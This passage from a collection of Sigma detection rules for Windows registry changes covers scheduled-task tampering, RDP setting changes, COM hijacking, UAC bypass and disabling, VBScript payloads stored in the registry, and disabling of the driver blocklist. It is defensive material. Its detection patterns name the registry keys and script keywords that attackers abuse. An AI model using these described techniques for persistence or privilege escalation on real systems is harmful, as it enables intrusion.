Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_taskcache_entry.yml",
    "content": "title: Scheduled TaskCache Change by Uncommon Program\nid: 4720b7df-40c3-48fd-bbdf-fd4b3c464f0d\nstatus: test\ndescription: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://labs.f-secure.com/blog/scheduled-task-tampering/\nauthor: Syed Hasan (@syedhasan009)\ndate: 2021-06-18\nmodified: 2025-10-22\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053\n    - attack.t1053.005\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\'\n    filter_main_empty:\n        Details: '(Empty)'\n    filter_main_null:\n        Details: null\n    filter_main_other:\n        TargetObject|contains:\n            - 'Microsoft\\Windows\\UpdateOrchestrator'\n            - 'Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\\Index'\n            - 'Microsoft\\Windows\\Flighting\\OneSettings\\RefreshCache\\Index'\n    filter_main_mousocoreworker:\n        Image|endswith: 'C:\\Windows\\System32\\MoUsoCoreWorker.exe'\n    filter_main_services:\n        Image|endswith: 'C:\\Windows\\System32\\services.exe'\n    filter_main_tiworker:\n        Image|startswith: 'C:\\Windows\\'\n        Image|endswith: '\\TiWorker.exe'\n    filter_main_svchost:\n        Image: 'C:\\WINDOWS\\system32\\svchost.exe'\n    filter_main_ngen:\n        Image|startswith: 'C:\\Windows\\Microsoft.NET\\Framework' # \\Framework\\ and \\Framework64\\\n        Image|endswith: '\\ngen.exe'\n        TargetObject|contains:\n            - '\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}'\n            - '\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN'\n    filter_main_office:\n        Image:\n            - 'C:\\Program Files\\Microsoft Office\\root\\Integration\\Integrator.exe'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\root\\Integration\\Integrator.exe'\n            - 'C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe'\n            - 'C:\\Program Files (x86)\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe'\n    filter_main_msiexec:\n        Image: 'C:\\Windows\\System32\\msiexec.exe'\n    filter_main_explorer:\n        Image: 'C:\\Windows\\explorer.exe'\n        TargetObject|contains: '\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor\\'\n    filter_main_system:\n        Image: 'System'\n    filter_main_runtimebroker:\n        Image: 'C:\\Windows\\System32\\RuntimeBroker.exe'\n    filter_optional_dropbox_updater:\n        Image:\n            - 'C:\\Program Files (x86)\\Dropbox\\Update\\DropboxUpdate.exe'\n            - 'C:\\Program Files\\Dropbox\\Update\\DropboxUpdate.exe'\n    filter_optional_edge:\n        Image|endswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe'\n            - 'C:\\Program Files\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe'\n    filter_optional_onedrive:\n        Image|endswith:\n            - 'C:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe'\n            - 'C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml",
    "content": "title: Potential Registry Persistence Attempt Via Windows Telemetry\nid: 73a883d0-0348-4be4-a8d8-51031c2564f8\nrelated:\n    - id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5\n      type: obsolete\nstatus: test\ndescription: |\n    Detects potential persistence behavior using the windows telemetry registry key.\n    Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\n    This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\n    The problem is, it will run any arbitrary command without restriction of location or type.\nreferences:\n    - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/\nauthor: Lednyov Alexey, oscd.community, Sreeman\ndate: 2020-10-16\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    category: registry_set\n    product: windows\n    definition: 'Requirements: Sysmon config that monitors \\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController subkey of the HKLM hives'\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\'\n        TargetObject|endswith: '\\Command'\n        Details|contains:\n            - '.bat'\n            - '.bin'\n            - '.cmd'\n            - '.dat'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.jar'\n            - '.js'\n            - '.msi'\n            - '.ps'\n            - '.sh'\n            - '.vb'\n    filter_main_generic:\n        Details|contains:\n            - '\\system32\\CompatTelRunner.exe'\n            - '\\system32\\DeviceCensus.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml",
    "content": "title: RDP Sensitive Settings Changed to Zero\nid: a2863fbc-d5cb-48d5-83fb-d976d4b1743b\nrelated:\n    - id: 3f6b7b62-61aa-45db-96bd-9c31b36b653c\n      type: similar\n    - id: 4b8f6d3a-9c5e-4f2a-a7d8-6b9c3e5f2a8d\n      type: similar\nstatus: test\ndescription: |\n    Detects tampering of RDP Terminal Service/Server sensitive settings.\n    Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\nreferences:\n    - https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html # Related to RDP hijacking via the \"ServiceDll\" key\n    - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ # Related to the Shadow RPD technique\n    - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 # Related to the Shadow RPD technique\n    - https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html\n    - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/\n    - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ # Contain description for most of the keys mentioned here (check it out if you want more information\n    - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services # Contain description for most of the keys mentioned here (check it out if you want more information)\nauthor: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali\ndate: 2022-09-29\nmodified: 2022-11-26\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - '\\fDenyTSConnections' # Specifies whether Remote Desktop connections are enabled - When set to zero RDP is enabled\n            - '\\fSingleSessionPerUser' # When changed to 0 it allows multiple RDP sessions\n            - '\\UserAuthentication' # Specifies that Network-Level user authentication is not required before the remote desktop connection is established\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml",
    "content": "title: RDP Sensitive Settings Changed\nid: 3f6b7b62-61aa-45db-96bd-9c31b36b653c\nrelated:\n    - id: 171b67e1-74b4-460e-8d55-b331f3e32d67\n      type: obsolete\n    - id: 41904ebe-d56c-4904-b9ad-7a77bdf154b3\n      type: obsolete\n    - id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b\n      type: similar\nstatus: test\ndescription: |\n    Detects tampering of RDP Terminal Service/Server sensitive settings.\n    Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n\n    Below is a list of registry keys/values that are monitored by this rule:\n\n    - Shadow: Used to enable Remote Desktop shadowing, which allows an administrator to view or control a user's session.\n    - DisableRemoteDesktopAntiAlias: Disables anti-aliasing for remote desktop sessions.\n    - DisableSecuritySettings: Disables certain security settings for Remote Desktop connections.\n    - fAllowUnsolicited: Allows unsolicited remote assistance offers.\n    - fAllowUnsolicitedFullControl: Allows unsolicited remote assistance offers with full control.\n    - InitialProgram: Specifies a program to run automatically when a user logs on to a remote computer.\n    - ServiceDll: Used in RDP hijacking techniques to specify a custom DLL to be loaded by the Terminal Services service.\n    - SecurityLayer: Specifies the security layer used for RDP connections.\nreferences:\n    - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ # Contains description for most of the keys mentioned here (check it out if you want more information)\n    - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ # Related to the Shadow RPD technique\n    - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services # Contains description for most of the keys mentioned here (check it out if you want more information)\n    - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/\n    - https://blog.sekoia.io/darkgate-internals/\n    - https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/\n    - https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry\n    - https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-64---disable-remote-desktop-security-settings-through-registry\n    - https://github.com/redcanaryco/atomic-red-team/blob/dd526047b8c399c312fee47d1e6fb531164da54d/atomics/T1112/T1112.yaml#L790\n    - https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-terminalservices-rdp-winstationextensions-securitylayer\n    - https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html\n    - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 # Related to the Shadow RPD technique\n    - https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html # Related to RDP hijacking via the \"ServiceDll\" key\n    - https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-ransomware.html\nauthor: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali\ndate: 2022-08-06\nmodified: 2025-11-22\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_shadow:\n        TargetObject|contains:\n            - '\\Control\\Terminal Server\\'\n            - '\\Windows NT\\Terminal Services\\'\n        TargetObject|endswith: '\\Shadow'\n        Details:\n            - 'DWORD (0x00000001)' # Full Control with user’s permission\n            - 'DWORD (0x00000002)' # Full Control without user’s permission\n            - 'DWORD (0x00000003)' # View Session with user’s permission\n            - 'DWORD (0x00000004)' # View Session without user’s permission\n    selection_terminal_services_key:\n        TargetObject|contains:\n            - '\\Control\\Terminal Server\\'\n            - '\\Windows NT\\Terminal Services\\'\n        TargetObject|endswith:\n            - '\\DisableRemoteDesktopAntiAlias' # Disable anti-aliasing for remote desktop (DarkGate malware)\n            - '\\DisableSecuritySettings' # Disable security settings, allowing access to programs/entire desktop (DarkGate malware)\n            - '\\fAllowUnsolicited' # Allow unsolicited remote assistance offers\n            - '\\fAllowUnsolicitedFullControl'\n        Details: 'DWORD (0x00000001)'\n    selection_tamper_only:\n        # Any changes to these keys should be suspicious and looked at\n        TargetObject|contains:\n            - '\\Control\\Terminal Server\\InitialProgram' # This value can be set to specify a program to run automatically when a user logs on to a remote computer.\n            - '\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram' # This value can be set to specify a program to run automatically when a user logs on to a remote computer.\n            - '\\services\\TermService\\Parameters\\ServiceDll' # RDP hijacking\n            - '\\Terminal Server\\WinStations\\RDP-Tcp\\SecurityLayer'\n            - '\\Windows NT\\Terminal Services\\InitialProgram' # This value can be set to specify a program to run automatically when a user logs on to a remote computer.\n    filter_main_securitylayer_tls:\n        TargetObject|endswith: '\\SecurityLayer'\n        Details: 'DWORD (0x00000002)' # TLS Enabled\n    condition: (selection_shadow or selection_terminal_services_key or selection_tamper_only) and not 1 of filter_main_*\nfalsepositives:\n    - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml",
    "content": "title: New TimeProviders Registered With Uncommon DLL Name\nid: e88a6ddc-74f7-463b-9b26-f69fc0d2ce85\nstatus: test\ndescription: |\n    Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\n    Adversaries may abuse time providers to execute DLLs when the system boots.\n    The Windows Time service (W32Time) enables time synchronization across and within domains.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md\nauthor: frack113\ndate: 2022-06-19\nmodified: 2024-03-26\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1547.003\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Services\\W32Time\\TimeProviders'\n        TargetObject|endswith: '\\DllName'\n    filter_main_w32time:\n        Details:\n            - '%SystemRoot%\\System32\\vmictimeprovider.dll'\n            - '%systemroot%\\system32\\w32time.dll'\n            - 'C:\\Windows\\SYSTEM32\\w32time.DLL'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml",
    "content": "title: Old TLS1.0/TLS1.1 Protocol Version Enabled\nid: 439957a7-ad86-4a8f-9705-a28131c6821b\nstatus: test\ndescription: Detects applications or users re-enabling old TLS versions by setting the \"Enabled\" value to \"1\" for the \"Protocols\" registry key.\nreferences:\n    - https://techcommunity.microsoft.com/t5/windows-it-pro-blog/tls-1-0-and-tls-1-1-soon-to-be-disabled-in-windows/ba-p/3887947\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-05\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.0\\'\n            - '\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.1\\'\n        TargetObject|endswith: '\\Enabled'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Legitimate enabling of the old tls versions due to incompatibility\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_treatas_persistence.yml",
    "content": "title: COM Hijacking via TreatAs\nid: dc5c24af-6995-49b2-86eb-a9ff62199e82\nstatus: test\ndescription: Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md\n    - https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s\nauthor: frack113\ndate: 2022-08-28\nmodified: 2025-07-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: 'TreatAs\\(Default)'\n    filter_office:\n        Image|startswith: 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    filter_office2:\n        Image:\n            - 'C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe'\n    filter_svchost:\n        # Example of target object by svchost\n        # TargetObject: HKLM\\SOFTWARE\\Microsoft\\MsixRegistryCompatibility\\Package\\Microsoft.Paint_11.2208.6.0_x64__8wekyb3d8bbwe\\User\\SOFTWARE\\Classes\\CLSID\\{0003000A-0000-0000-C000-000000000046}\\TreatAs\\(Default)\n        # TargetObject: HKU\\S-1-5-21-1000000000-000000000-000000000-0000_Classes\\CLSID\\{0003000A-0000-0000-C000-000000000046}\\TreatAs\\(Default)\n        Image: 'C:\\Windows\\system32\\svchost.exe'\n    filter_misexec:\n        # This FP has been seen during installation/updates\n        Image:\n            - 'C:\\Windows\\system32\\msiexec.exe'\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml",
    "content": "title: Potential Signing Bypass Via Windows Developer Features - Registry\nid: b110ebaf-697f-4da1-afd5-b536fa27a2c1\nrelated:\n    - id: a383dec4-deec-4e6e-913b-ed9249670848\n      type: similar\nstatus: test\ndescription: Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.\nreferences:\n    - https://twitter.com/malmoeb/status/1560536653709598721\n    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-12\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Microsoft\\Windows\\CurrentVersion\\AppModelUnlock'\n            - '\\Policies\\Microsoft\\Windows\\Appx\\'\n        TargetObject|endswith:\n            - '\\AllowAllTrustedApps'\n            - '\\AllowDevelopmentWithoutDevLicense'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml",
    "content": "title: UAC Bypass via Event Viewer\nid: 7c81fec3-1c1d-43b0-996a-46753041b1b6\nstatus: test\ndescription: Detects UAC bypass method using Windows event viewer\nreferences:\n    - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\n    - https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-19\nmodified: 2023-09-28\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\n    - car.2019-04-001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: '\\mscfile\\shell\\open\\command'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml",
    "content": "title: UAC Bypass via Sdclt\nid: 5b872a46-3b90-45c1-8419-f675db8053aa\nstatus: test\ndescription: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)\nreferences:\n    - https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/\n    - https://github.com/hfiref0x/UACME\nauthor: Omer Yampel, Christian Burkard (Nextron Systems)\ndate: 2017-03-17\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\n    - car.2019-04-001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection1:\n        TargetObject|endswith: 'Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand'\n    selection2:\n        TargetObject|endswith: 'Software\\Classes\\Folder\\shell\\open\\command\\SymbolicLinkValue'\n        Details|re: '-1[0-9]{3}\\\\Software\\\\Classes\\\\'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml",
    "content": "title: UAC Bypass Abusing Winsat Path Parsing - Registry\nid: 6597be7b-ac61-4ac8-bef4-d3ec88174853\nstatus: test\ndescription: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Root\\InventoryApplicationFile\\winsat.exe|'\n        TargetObject|endswith: '\\LowerCaseLongPath'\n        Details|startswith: 'c:\\users\\'\n        Details|endswith: '\\appdata\\local\\temp\\system32\\winsat.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml",
    "content": "title: UAC Bypass Using Windows Media Player - Registry\nid: 5f9db380-ea57-4d1e-beab-8a2d33397e93\nstatus: test\ndescription: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-23\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store\\C:\\Program Files\\Windows Media Player\\osk.exe'\n        Details: 'Binary Data'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_uac_disable.yml",
    "content": "title: UAC Disabled\nid: 48437c39-9e5f-47fb-af95-3d663c3f2919\nrelated:\n    - id: c5f6a85d-b647-40f7-bbad-c10b66bab038\n      type: similar\n    - id: 0d7ceeef-3539-4392-8953-3dc664912714\n      type: similar\nstatus: stable\ndescription: |\n    Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value \"EnableLUA\" to 0.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md\nauthor: frack113\ndate: 2022-01-05\nmodified: 2024-05-10\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_uac_disable_notification.yml",
    "content": "title: UAC Notification Disabled\nid: c5f6a85d-b647-40f7-bbad-c10b66bab038\nrelated:\n    - id: 0d7ceeef-3539-4392-8953-3dc664912714\n      type: similar\n    - id: 48437c39-9e5f-47fb-af95-3d663c3f2919\n      type: similar\nstatus: test\ndescription: |\n    Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the \"UACDisableNotify\" value.\n    UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.\n    When \"UACDisableNotify\" is set to 1, UAC prompts are suppressed.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md\n    - https://securityintelligence.com/x-force/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-05-10\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Security Center\\UACDisableNotify'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_uac_disable_secure_desktop_prompt.yml",
    "content": "title: UAC Secure Desktop Prompt Disabled\nid: 0d7ceeef-3539-4392-8953-3dc664912714\nrelated:\n    - id: c5f6a85d-b647-40f7-bbad-c10b66bab038\n      type: similar\n    - id: 48437c39-9e5f-47fb-af95-3d663c3f2919\n      type: similar\nstatus: test\ndescription: |\n    Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the \"PromptOnSecureDesktop\" value.\n    The \"PromptOnSecureDesktop\" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.\n    When \"PromptOnSecureDesktop\" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md\nauthor: frack113\ndate: 2024-05-10\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml",
    "content": "title: VBScript Payload Stored in Registry\nid: 46490193-1b22-4c29-bdd6-5bf63907216f\nstatus: test\ndescription: Detects VBScript content stored into registry keys as seen being used by UNC2452 group\nreferences:\n    - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-03-05\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'Software\\Microsoft\\Windows\\CurrentVersion'\n        Details|contains:\n            - 'vbscript:'\n            - 'jscript:'\n            - 'mshtml,'\n            - 'RunHTMLApplication'\n            - 'Execute('\n            - 'CreateObject'\n            - 'window.close'\n    filter:\n        TargetObject|contains: 'Software\\Microsoft\\Windows\\CurrentVersion\\Run'\n    filter_dotnet:\n        Image|endswith: '\\msiexec.exe'\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\'\n        Details|contains:\n            - '\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll'\n            - '<\\Microsoft.mshtml,fileVersion='\n            - '_mshtml_dll_'\n            - '<\\Microsoft.mshtml,culture='\n    condition: selection and not 1 of filter*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_vulnerable_driver_blocklist_disable.yml",
    "content": "title: Windows Vulnerable Driver Blocklist Disabled\nid: d526c60a-e236-4011-b165-831ffa52ab70\nrelated:\n    - id: 22154f0e-5132-4a54-aa78-cc62f6def531\n      type: similar\nstatus: experimental\ndescription: |\n    Detects when the Windows Vulnerable Driver Blocklist is set to disabled. This setting is crucial for preventing the loading of known vulnerable drivers,\n    and its modification may indicate an attempt to bypass security controls. It is often targeted by threat actors to facilitate the installation of malicious or vulnerable drivers,\n    particularly in scenarios involving Endpoint Detection and Response (EDR) bypass techniques.\n    This rule applies to systems that support the Vulnerable Driver Blocklist feature, including Windows 10 version 1903 and later, and Windows Server 2022 and later.\n    Note that this change will require a reboot to take effect, and this rule only detects the registry modification action.\nreferences:\n    - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules\n    - https://www.sophos.com/en-us/blog/sharpening-the-knife-gold-blades-strategic-evolution\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/microsoft-recommended-driver-block-rules\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-01-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Control\\CI\\Config\\VulnerableDriverBlocklistEnable'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unlikely and should be investigated immediately.\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_vulnerable_driver_blocklist_disable/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml",
